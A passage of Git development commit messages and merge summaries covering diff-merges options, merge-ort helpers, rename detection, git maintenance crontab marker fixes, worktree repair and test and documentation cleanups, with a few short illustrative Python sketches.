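    """Return (base_size, result_size, offset_of_first_instruction)."""
    base_size, pos = decode_size(delta, 0)
    result_size, pos = decode_size(delta, pos)
    return base_size, result_size, pos
```

For example, the bytes 0x90 0x01 decode to 144 (16 from the first byte
plus 1 << 7 from the second).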
Reported-by: Ross Light <ross@zombiezen.com>
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 25d5ea410f ("[PATCH] Redo rename/copy detection logic.",
2005-05-24) added a duplicate entry check on rename_src in order to
avoid segfaults; the code at the time was prone to double free()s and an
easy way to avoid it was just to turn off rename detection for any
duplicate entries. Note that the form of the check was modified two
commits ago in this series.
Similarly, commit 4d6be03b95 ("diffcore-rename: avoid processing
duplicate destinations", 2015-02-26) added a duplicate entry check
on rename_dst for the exact same reason -- the code was prone to double
free()s, and an easy way to avoid it was just to turn off rename
detection entirely. Note that the form of the check was modified in the
commit just before this one.
In the original code in both places, the code was dealing with
individual diff_filespecs and trying to match things up, instead of just
keeping the original diff_filepairs around as we do now. The
intervening change in structure has fixed the accounting problems and
the associated double free()s that used to occur, and thus we already
have a better fix. As such, we can remove the band-aid checks for
duplicate entries.
Due to the last two patches, the diffcore_rename() setup is no longer a
sizeable chunk of overall runtime. Thus, in a large rebase of many
commits with lots of renames and several optimizations to inexact rename
detection, this patch only speeds up the overall code by about half a
percent or so and is pretty close to the run-to-run variability making
it hard to get an exact measurement. However, with some trace2 regions
around the setup code in diffcore_rename() so that I can focus on just
it, I measure that this patch consistently saves almost a third of the
remaining time spent in diffcore_rename() setup.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6016 manually reconstructs git log --graph output by using the reported
commit hashes from `git rev-parse`. Each tag is converted into an
environment variable manually, and then `echo`-ed to an expected output
file, which is in turn compared to the actual output.
The expected output is difficult to read and write, because, e.g.,
each line of output must be prefaced with echo, quoted, and properly
escaped. Additionally, the test is sensitive to trailing whitespace,
which may potentially be removed from graph log output in the future.
In order to reduce duplication, ease troubleshooting of failed tests by
improving readability, and ease the addition of more tests to this file,
port the operations to `lib-log-graph.sh`, which is already used in
several other tests, e.g., t4215. Give all merges a simple commit
message, and use a common `check_graph` macro taking a heredoc of the
expected output which does not require extensive escaping.
Signed-off-by: Antonio Russo <aerusso@aerusso.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use various made-up config keys in the "core" section for no real
reason. Change them to work in the "section" section instead and be
careful to also change "cores" to "sections". Make sure to also catch
"Core", "CoReS" and similar.
There are a few instances that actually want to work with a real "core"
config such as `core.bare` or `core.editor`. After this, it's clearer
that they work with "core" for a reason.
Reported-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We test that we can handle `git config --file symlink` and the error
case of `git config --file symlink-to-missing-file`. For good measure,
we also throw in a test to check that we correctly handle referencing a
missing regular file. But we have such a test earlier in this script.
They both check that we fail to use `--file no-such-file --list`.
Drop the latter of these and keep the one that is in the general area
where we test `--file` and `GIT_CONFIG`. The one we're dropping also
checks that we can't even get a specific key from the missing file --
let's make sure we check that in the test we keep.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have two tests for checking that we can handle `git config --file
../other-config ...`. One, using `--file`, was introduced in 65807ee697
("builtin-config: Fix crash when using "-f <relative path>" from
non-root dir", 2010-01-26), then another, using `GIT_CONFIG`, came about
in 270a34438b ("config: stop using config_exclusive_filename",
2012-02-16).
The latter of these was then converted to use `--file` in f7e8714101
("t: prefer "git config --file" to GIT_CONFIG", 2014-03-20). Both were
then simplified in a5db0b77b9 ("t1300: extract and use
test_cmp_config()", 2018-10-21).
These two tests differ slightly in the order of the options used, but
other than that, they are identical. Let's drop one. As noted in
f7e8714101, we do still have a test for `GIT_CONFIG` and it shares the
implementation with `--file`.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'gitmodules.txt' is a guide about the '.gitmodules' file that describes
submodule properties, and that file must exist at the root of the
repository. This was clarified in e5b5c1d2cf (Document clarification:
gitmodules, gitattributes, 2008-08-31).
However, that commit mistakenly uses the non-existing environment
variable 'GIT_WORK_DIR' to refer to the root of the repository.
Fix that by using the correct variable, 'GIT_WORK_TREE'. Take the
opportunity to modernize and improve the formatting of that guide,
and fix a grammar mistake.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Acked-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add some handling that explicitly considers collisions of the following
types:
* file/submodule
* file/symlink
* submodule/symlink
Leaving them as conflicts at the same path makes them hard for users to
resolve, so move one or both of them aside so that they each get their
own path.
Note that in the case of recursive handling (i.e. call_depth > 0), we
can just use the merge base of the two merge bases as the merge result
much like we do with modify/delete conflicts, binary files, conflicting
submodule values, and so on.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Code is identical for the function body in the two files, the call
signature is just slightly different in merge-ort than merge-recursive
as noted a couple commits ago.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This implementation is based on a mixture of print_commit() and
output_commit_title() from merge-recursive.c so that it can be used to
take over both functions.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Take merge_submodule() from merge-recursive.c and make slight
adjustments, predominantly around deferring output using path_msg()
instead of using merge-recursive's output() and show() functions.
There's also a fix for recursive cases (when call_depth > 0) and a
slight change to argument order for find_first_merges().
find_first_merges() and format_commit() are left unimplemented for
now, but will be added by subsequent commits.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Take merge_3way() from merge-recursive.c and make slight adjustments
based on different data structures (direct usage of object_id
rather than diff_filespec, separate pathnames which, based on our careful
interning of pathnames in opt->priv->paths can be compared with '!='
rather than 'strcmp').
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This implementation is based heavily on merge_mode_and_contents() from
merge-recursive.c, though it has some fixes for recursive merges (i.e.
when call_depth > 0), and has a number of changes throughout based on
slight differences in data structures and in how the functions are
called.
It is, however, based on two new helper functions -- merge_3way() and
merge_submodule -- for which we only provide die-not-implemented stubs
at this point. Future commits will add implementations of these
functions.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the content merge (which will go in a subsequent commit),
we need to worry about conflict messages, placing results in higher
order stages in case of a df_conflict, and making sure the results are
placed in ci->merged.result so that they will show up in the working
tree. Take care of all that external book-keeping, moving the
simplistic just-take-HEAD code into the barebones handle_content_merge()
function for now. Subsequent commits will flesh out
handle_content_merge().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement unique_path(), based on the one from merge-recursive.c. It is
simplified, however, due to: (1) using strmaps, and (2) the fact that
merge-ort lets the checkout codepath handle possible collisions with the
working tree, which means that other code locations don't have to.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a directory/file conflict remains, we can leave the directory where
it is, but need to move the information about the file to a different
pathname. After moving the file to a different pathname, we allow
subsequent process_entry() logic to handle any additional details that
might be relevant.
This depends on a new helper function, unique_path(), that dies with an
unimplemented error currently but will be implemented in a subsequent
commit.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When one side has a directory at a given path and the other side of
history has a file at the path, but the merge resolves the directory
away (e.g. because no path within that directory was modified and the
other side deleted it, or because renaming moved all the files
elsewhere), then we don't actually have a conflict anymore. We just
need to clear away any information related to the relevant directory,
and then the subsequent process_entry() handling can handle the given
path.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We'll keep this document mostly in sync with the upstream; let's
help "git am" and "git show" by telling them that they may introduce
what we may consider whitespace errors.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Hotfix for a topic of this cycle.
* ma/maintenance-crontab-fix:
t7900-maintenance: test for magic markers
gc: fix handling of crontab magic markers
git-maintenance.txt: add missing word
Test coverage fix.
* js/no-more-prepare-for-main-in-test:
tests: drop the `PREPARE_FOR_MAIN_BRANCH` prereq
t9902: use `main` as initial branch name
t6302: use `main` as initial branch name
t5703: use `main` as initial branch name
t5510: use `main` as initial branch name
t5505: finalize transitioning to using the branch name `main`
t3205: finalize transitioning to using the branch name `main`
t3203: complete the transition to using the branch name `main`
t3201: finalize transitioning to using the branch name `main`
t3200: finish transitioning to the initial branch name `main`
t1400: use `main` as initial branch name
"git pack-redundant" when there is only one packfile used to crash,
which has been corrected.
* jx/pack-redundant-on-single-pack:
pack-redundant: fix crash when one packfile in repo
Example of pattern file type: text+k
Text filtered through the p4 pattern regexp must be converted from
string back to bytes, otherwise 'data' command for the fast-import
will receive extra invalid characters, followed by the fast-import
process error.
CC: Yang Zhao <yang.zhao@skyboxlabs.com>
Signed-off-by: Daniel Levin <dendy.ua@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This allows users to write hash-agnostic scripts and configs by
disabling abbreviations. Using "-c core.abbrev=40" will be
insufficient with SHA-256, and "-c core.abbrev=64" won't work with
SHA-1 repos today.
Signed-off-by: Eric Wong <e@80x24.org>
[jc: tweaked implementation, added doc and a test]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Amend the wording of documentation added in 6cfec03680 (mktag:
minimally update the description., 2007-06-10). It makes more sense to
say "when it exists" here, as we're referring to "the message".
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the "mktag" documentation to refer to the input hash as just
"hash", not "sha1". This command has supported SHA-256 for a while
now.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
test_export() has been self-recursive since its inception even though a
simple for-loop would have served just as well to append its arguments
to the `test_export_` variable separated by the pipe character "|".
Recently `test_export_` was changed instead to a space-separated list of
tokens to be exported, an operation which can be accomplished via a
single simple assignment, with no need for looping or recursion.
Therefore, simplify the implementation.
While at it, take advantage of the fact that variable names to be
exported are shell identifiers, thus won't be composed of special
characters or whitespace, thus a simple `$*` can be used rather than
magical `"$@"`.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'linkgit' Asciidoc macro is misspelled as 'linkit' in the
description of 'GIT_SEQUENCE_EDITOR' since the addition of that variable
to git(1) in 902a126eca (doc: mention GIT_SEQUENCE_EDITOR and
'sequence.editor' more, 2020-08-31). Also, it uses two colons instead of
one.
Fix that.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Comment did not adequately explain how the two loops work
together to achieve the goal of querying for matching of any
negative refspec.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The logic added to check for negative pathspec match by c0192df630
(refspec: add support for negative refspecs, 2020-09-30) looks at
refspec->src assuming it is never NULL, however when
remote.origin.push is set to ":", then refspec->src is NULL,
causing a segfault within strcmp.
Tell git to handle matching refspec by adding the needle to the
set of positively matched refspecs, since matching ":" refspecs
match anything as src.
Add test for matching refspec pushes fetch-negative-refspec
both individually and in combination with a negative refspec.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we insert our "BEGIN" and "END" markers into the cron table, it's
so that a Git version from many years into the future would be able to
identify this region in the cron table. Let's add a test to make sure
that these markers don't ever change.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On `git maintenance start`, we add a few entries to the user's cron
table. We wrap our entries using two magic markers, "# BEGIN GIT
MAINTENANCE SCHEDULE" and "# END GIT MAINTENANCE SCHEDULE". At a later
`git maintenance stop`, we will go through the table and remove these
lines. Or rather, we will remove the "BEGIN" marker, the "END" marker
and everything between them.
Alas, we have a bug in how we detect the "END" marker: we don't. As we
loop through all the lines of the crontab, if we are in the "old
region", i.e., the region we're aiming to remove, we make an early
`continue` and don't get as far as checking for the "END" marker. Thus,
once we've seen our "BEGIN", we remove everything until the end of the
file.
Rewrite the logic for identifying these markers. There are four cases
that are mutually exclusive: The current line starts a region or it ends
it, or it's firmly within the region, or it's outside of it (and should
be printed).
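The four mutually exclusive cases can be sketched in Python as follows.
This is only an illustration of the control flow described above, not
the C code in Git; the function name strip_schedule() is hypothetical,
and the marker strings are the ones quoted in this message.

```python
BEGIN_LINE = "# BEGIN GIT MAINTENANCE SCHEDULE"
END_LINE = "# END GIT MAINTENANCE SCHEDULE"


def strip_schedule(lines):
    """Return the crontab lines with the marked region removed."""
    kept = []
    in_old_region = False
    for line in lines:
        if not in_old_region and line == BEGIN_LINE:
            # Case 1: the line starts the region.
            in_old_region = True
        elif in_old_region and line == END_LINE:
            # Case 2: the line ends the region.
            in_old_region = False
        elif in_old_region:
            # Case 3: firmly within the region, so drop it.
            continue
        else:
            # Case 4: outside the region, so keep (print) it.
            kept.append(line)
    return kept
```

Because the "END" check comes before the "within the region" case, any
entries that follow the end marker survive, which is exactly what the
old early `continue` prevented.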
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This fixes a segmentation fault.
The bug is caused by dereferencing `new_branch_info->commit` when it is
`NULL`, which is the case when the tree-ish argument is actually a tree,
not a commit-ish. This was introduced in 5602b500c3 (builtin/checkout:
fix `git checkout -p HEAD...` bug, 2020-10-07), where we tried to ensure
that the special tree-ish `HEAD...` is handled correctly.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This new option provides essential new functionality, changing diff
output to first parent only, without changing history traversal mode,
so it deserves its own test.
While at it, add an additional test that --diff-merges=first-parent by
itself doesn't imply -p and only outputs diffs for merge commits.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move description of --diff-merges option from git-log.txt to
diff-options.txt so that it is included in the git-show help.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After the introduction of --diff-merges=first-parent, the
--first-parent option sets the default format for merges to the same value as
this new option. Document this behavior and add corresponding
reference to --diff-merges.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mention --diff-merges instead of -m in a note to merge formats to aid
discoverability, as -m is now described among --diff-merges options
anyway.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Describe all the new --diff-merges options in git-log.txt and
adapt the descriptions of the original options accordingly.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we now have --diff-merges={m|c|cc}, add --diff-merges=1 as synonym
for --diff-merges=first-parent, to have shorter mnemonics for it as
well.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds --diff-merges={m|c|cc} values that match mnemonics of old
options, for those who are used to them.
Note that, say, --diff-merges=cc behaves differently than --cc, as the
latter implies -p and therefore enables diffs for all the commits,
while the former enables output of diffs for merge commits only.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
New options don't have any visible effect unless -p is either given or
implied, as unlike -c/-cc we don't imply -p with --diff-merges. To fix
this, this patch adds new functionality by letting new options enable
output of diffs for merge commits only.
Add 'merges_need_diff' field and set it whenever diff output for merges is
enabled by any of the new options.
Extend diff output logic accordingly, to output diffs for merges when
'merges_need_diff' is set even when no -p has been provided.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add 'combined_imply_patch' field and set it only for old --cc/-c
options, then imply -p if this flag is set instead of implying -p
whenever 'combined_merge' flag is set.
We don't want the new --diff-merges options to imply -p, to make it
possible to enable output of diffs for merges independently from
non-merge commits. At the same time we want to preserve behavior of
old --cc/-c/-m options and their interactions with --first-parent, to
stay backward-compatible.
This patch is the first step in this direction: it separates old "--cc/-c
imply -p" logic from the rest of the options.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We first implement new options as exact synonyms for their original
counterparts, to get all the infrastructure right, and keep functional
improvements for later commits.
The following values are implemented:
    --diff-merges=          old equivalent
    first|first-parent    = --first-parent (only format implications)
    sep|separate          = -m
    comb|combined         = -c
    dense|dense-combined  = --cc
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
-c/--cc got precedence over -m only because of external logic where
corresponding flags are checked before that for -m. This is too
error-prone, so add code that explicitly makes these 3 options
mutually exclusive, so that the last option specified on the
command-line gets precedence.
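A minimal Python sketch of "last option wins" follows. It only illustrates the intended precedence rule and is not the actual option parser; the function name `select_merge_format` and the returned format labels are assumptions made for this example.

```python
def select_merge_format(args):
    """Return the merge diff format chosen by the last of -m, -c, --cc."""
    formats = {"-m": "separate", "-c": "combined", "--cc": "dense-combined"}
    chosen = None
    for arg in args:
        if arg in formats:
            # Each option replaces whatever an earlier one selected,
            # so the three formats are mutually exclusive.
            chosen = formats[arg]
    return chosen
```

With this rule, the outcome depends only on command-line order, not on the order in which flags happen to be checked elsewhere.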
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To prepare introduction of new options some of which will be synonyms
to existing options, let every option handling code just call
corresponding function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After getting rid of 'ignore_merges' field, the diff_merges_init_revs()
function became empty. Get rid of it.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The relevant flags were somewhat scattered over definition of 'struct
rev_info'. Rearrange them to group them together.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'ignore_merges' was 3-way field that served two distinct purposes that
we now assign to 2 new independent flags: 'separate_merges', and
'explicit_diff_merges'.
'separate_merges' tells that we need to output diff format containing
separate diff for every parent (as opposed to 'combine_merges').
'explicit_diff_merges' tells that at least one of diff-merges options
has been explicitly specified on the command line, so no defaults
should apply.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Logically, -m, -c, --cc specify 3 different formats for representing
merge commits, yet -m doesn't in fact override -c or --cc, which makes
no sense.
Fix -m to properly override -c/--cc, and change the tests accordingly.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Logically, -m, -c, --cc specify 3 different formats for representing
merge commits, yet -m doesn't in fact override -c or --cc, which makes
no sense.
Add 2 expected to fail tests that demonstrate the problem.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add support to be able to specify expected failure, through :failure
magic, like this:
:failure cmd args
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Do not set revs->diff when we encounter an option that needs it, as
it'd be impossible to undo later. Besides, some other options than
what we handle here set this flag as well, and we'd interfere with
them trying to clear this flag later.
Rather set revs->diff, if finally needed, in diff_merges_setup_revs().
As an additional bonus, this also makes our code shorter.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move logic that handles implying -p on -c/--cc from
log_setup_revisions_tweak() to diff_merges_setup_revs(), where it
belongs.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This new field allows us to separate the format of diffs for merges from
the 'first_parent_only' flag, whose primary purpose is limiting history
traversal.
This change further localizes diff format selection logic into the
diff-merges.c file.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call it where given functionality is needed instead of direct
checking/tweaking of diff merges related fields.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function sets all the relevant flags to the disabled state, so that
no code that checks only one of them gets it wrong.
Then we call this new function everywhere where diff merges output
suppression is needed.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For clarity, define public functions in the order they are called, to
make logic inter-dependencies easier to grok.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename diff_merges_default_to_enable() to
diff_merges_default_to_first_parent() to match its semantics.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The checks for first_parent_only don't in fact belong to this module,
as the primary purpose of this flag is history traversal limiting, so
get it out of this module and rename the
diff_merges_first_parent_defaults_to_enable()
to
diff_merges_default_to_enable()
to match new semantics.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the same "diff_merges" prefix for all the diff merges function
names.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create separate diff-merges.c and diff-merges.h files, and move all
the code related to handling of diff merges there.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use these implementations from show_setup_revisions_tweak() and
log_setup_revisions_tweak() in builtin/log.c.
This completes moving of management of diff merges parameters to a
single place, where we can finally observe them simultaneously.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move initialization code related to diffing merges into new
init_diff_merge_revs() function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move all the setting code related to diffing merges into new
setup_diff_merge_revs() function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move all the parsing code related to diffing merges into new
parse_diff_merge_opts() function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git worktree repair` knows how to repair the two-way links between the
repository and a worktree as long as a link in one or the other
direction is sound. For instance, if a linked worktree is moved (without
using `git worktree move`), repair is possible because the worktree
still knows the location of the repository even though the repository no
longer knows where the worktree is. Similarly, if the repository is
moved, repair is possible since the repository still knows the locations
of the worktrees even though the worktrees no longer know where the
repository is.
However, if both the repository and the worktrees are moved, then links
are severed in both directions, and no repair is possible. This is the
case even when the new worktree locations are specified as arguments to
`git worktree repair`. The reason for this limitation is twofold. First,
when `repair` consults the worktree's gitfile (/path/to/worktree/.git)
to determine the corresponding <repo>/worktrees/<id>/gitdir file to fix,
<repo> is the old path to the repository, thus it is unable to fix the
`gitdir` file at its new location since it doesn't know where it is.
Second, when `repair` consults <repo>/worktrees/<id>/gitdir to find the
location of the worktree's gitfile (/path/to/worktree/.git), the path
recorded in `gitdir` is the old location of the worktree's gitfile, thus
it is unable to repair the gitfile since it doesn't know where it is.
Fix these shortcomings by teaching `repair` to attempt to infer the new
location of the <repo>/worktrees/<id>/gitdir file when the location
recorded in the worktree's gitfile has become stale but the file is
otherwise well-formed. The inference is intentionally simple-minded.
For each worktree path specified as an argument, `git worktree repair`
manually reads the ".git" gitfile at that location and, if it is
well-formed, extracts the <id>. It then searches for a corresponding
<id> in <repo>/worktrees/ and, if found, concludes that there is a
reasonable match and updates <repo>/worktrees/<id>/gitdir to point at
the specified worktree path. In order for <repo> to be known, `git
worktree repair` must be run in the main worktree or bare repository.
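The inference can be sketched roughly as below. This is a simplified Python illustration, not the implementation in this patch: the function name `infer_worktree_id` is hypothetical, `known_ids` stands in for the entries found under <repo>/worktrees/, and the sketch assumes the gitfile has the form "gitdir: <path>/worktrees/<id>".

```python
import posixpath


def infer_worktree_id(gitfile_text, known_ids):
    """Extract <id> from a worktree gitfile and check it against the repo.

    gitfile_text -- contents of /path/to/worktree/.git
    known_ids    -- names of the entries under <repo>/worktrees/
    Returns the matching <id>, or None if no inference can be made.
    """
    prefix = "gitdir: "
    text = gitfile_text.strip()
    if not text.startswith(prefix):
        return None  # gitfile is not well-formed
    recorded = text[len(prefix):].rstrip("/")
    # The recorded (possibly stale) path is expected to end in worktrees/<id>.
    parent, worktree_id = posixpath.split(recorded)
    if posixpath.basename(parent) != "worktrees" or not worktree_id:
        return None
    # Only conclude there is a match if the repository knows this <id>.
    return worktree_id if worktree_id in known_ids else None
```

When an <id> is returned, the caller would update <repo>/worktrees/<id>/gitdir to point at the worktree path given on the command line.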
`git worktree repair` first attempts to repair each incoming
/path/to/worktree/.git gitfile to point at the repository, and then
attempts to repair outgoing <repo>/worktrees/<id>/gitdir files to point
at the worktrees. This sequence was chosen arbitrarily when originally
implemented since the order of fixes is immaterial as long as one side
of the two-way link between the repository and a worktree is sound.
However, for this new repair technique to work, the order must be
reversed. This is because the new inference mechanism, when it is
successful, allows the outgoing <repo>/worktrees/<id>/gitdir file to be
repaired, thus fixing one side of the two-way link. Once that side is
fixed, the other side can be fixed by the existing repair mechanism,
hence the order of repairs is now significant.
Two safeguards are employed to avoid hijacking a worktree from a
different repository if the user accidentally specifies a foreign
worktree as an argument. The first, as described above, is that it
requires an <id> match between the repository and the worktree. That
itself is not foolproof for preventing hijack, so the second safeguard
is that the inference will only kick in if the worktree's
/path/to/worktree/.git gitfile does not point at a repository.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit ba7eafe146 (t6030: explicitly test for bisection cleanup,
2017-09-29) introduced checks for files in the $GIT_DIR directory, but
that variable is not always defined, and in this test file it's not.
Therefore these checks always passed regardless of the presence of these
files (unless the user has some /BISECT_LOG file, for some reason).
Let's check the files in the correct location.
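To see why the old checks could never fail, consider how a path built from an unset variable expands. The following Python sketch mimics the shell expansion of "$GIT_DIR/BISECT_LOG"; the helper name `bisect_log_path` is made up for this illustration.

```python
def bisect_log_path(env):
    """Build the path the way "$GIT_DIR/BISECT_LOG" expands in a shell."""
    # An unset variable expands to the empty string, so the result
    # silently becomes an absolute path at the filesystem root.
    return env.get("GIT_DIR", "") + "/BISECT_LOG"
```

With GIT_DIR unset the path is "/BISECT_LOG", a file that normally does not exist, so a "file is missing" check passes no matter what the repository contains.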
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* github/master: (42 commits)
Git 2.30-rc1
git-gui: use gray background for inactive text widgets
Another batch before 2.30-rc1
git-gui: Fix selected text colors
Makefile: conditionally include GIT-VERSION-FILE
git-gui: fix colored label backgrounds when using themed widgets
config.mak.uname: remove old NonStop compatibility settings
diff: correct interaction between --exit-code and -I<pattern>
t/perf: fix test_export() failure with BSD `sed`
style: do not "break" in switch() after "return"
compat-util: pretend that stub setitimer() always succeeds
strmap: make callers of strmap_remove() to call it in void context
doc: mention Python 3.x supports
index-format.txt: document v2 format of file system monitor extension
docs: multi-pack-index: remove note about future 'verify' work
init: provide useful advice about init.defaultBranch
get_default_branch_name(): prepare for showing some advice
branch -m: allow renaming a yet-unborn branch
init: document `init.defaultBranch` better
t7900: use --fixed-value in git-maintenance tests
...
"git diff -I<pattern> --exit-code" should exit with 0 status when
all the changes match the ignored pattern, but it didn't.
* jc/diff-I-status-fix:
diff: correct interaction between --exit-code and -I<pattern>
Our users are going to be trained to prepare for future change of
init.defaultBranch configuration variable.
* js/init-defaultbranch-advice:
init: provide useful advice about init.defaultBranch
get_default_branch_name(): prepare for showing some advice
branch -m: allow renaming a yet-unborn branch
init: document `init.defaultBranch` better
* https://github.com/prati0100/git-gui:
git-gui: use gray background for inactive text widgets
git-gui: Fix selected text colors
Makefile: conditionally include GIT-VERSION-FILE
git-gui: fix colored label backgrounds when using themed widgets
git-gui: ssh-askpass: add a checkbox to show the input text
git-gui: update Russian translation
git-gui: use commit message template
git-gui: Only touch GITGUI_MSG when needed
Set a different background color for selections in inactive widgets.
This inactive color is calculated from the current theme colors to make
sure it works for all themes.
* sh/inactive-background:
git-gui: use gray background for inactive text widgets
This makes it easier to see at a glance which of the four main views has the
keyboard focus.
Signed-off-by: Stefan Haller <stefan@haller-berlin.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
Build optimization.
* rj/make-clean:
Makefile: don't use a versioned temp distribution directory
Makefile: don't try to clean old debian build product
gitweb/Makefile: conditionally include ../GIT-VERSION-FILE
Documentation/Makefile: conditionally include ../GIT-VERSION-FILE
Documentation/Makefile: conditionally include doc.dep
Code clean-up.
* jk/oid-array-cleanup:
commit-graph: use size_t for array allocation and indexing
commit-graph: replace packed_oid_list with oid_array
commit-graph: drop count_distinct_commits() function
oid-array: provide a for-loop iterator
oid-array: make sort function public
cache.h: move hash/oid functions to hash.h
t0064: make duplicate tests more robust
t0064: drop sha1 mention from filename
oid-array.h: drop sha1 mention from header guard
